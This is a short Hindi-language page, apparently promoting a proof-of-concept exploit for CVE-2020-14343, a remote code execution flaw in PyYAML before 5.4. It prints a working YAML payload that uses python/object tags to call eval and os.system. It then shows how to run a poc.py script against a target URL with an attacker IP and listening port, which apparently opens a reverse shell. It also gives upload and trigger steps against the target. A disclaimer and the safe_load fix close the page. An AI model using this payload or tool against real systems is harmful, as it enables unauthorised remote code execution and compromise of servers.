
CVE-2020-14343 का पेलोड
| आइटम | जानकारी |
|---|
| CVE आईडी | CVE-2020-14343 |
| प्रभावित घटक | PyYAML < 5.4 |
| भेद्यता प्रकार | डिसीरियलाइज़ेशन रिमोट कोड निष्पादन (RCE) |
| खतरा स्तर | उच्च जोखिम |
PyYAML yaml.load() का उपयोग करके अविश्वसनीय डेटा को पार्स करते समय, खतरनाक YAML टैग (जैसे !!python/object) को प्रतिबंधित नहीं करता है, हमलावर मैलिशियस YAML सामग्री बनाकर मनमाना Python कोड निष्पादित कर सकता है।
पेलोड मुख्य:
!!python/object/new:tuple
- !!python/object/new:map
- !!python/name:eval
- ["__import__('os').system('command')"]
python poc.py <लक्ष्यURL> <हमलावरIP> <सुननेवालापोर्ट>
उदाहरण:
python poc.py http://vulnerable-site.com 192.168.1.100 4444
/upload इंटरफेस पर मैलिशियस YAML फ़ाइल अपलोड करें/login इंटरफेस ट्रिगर करें जो YAML लोड और पार्स करता हैpip install requests
⚠️ यह उपकरण केवल सुरक्षा अनुसंधान और अधिकृत परीक्षण के लिए है!
yaml.load() के बजाय yaml.safe_load() का उपयोग करें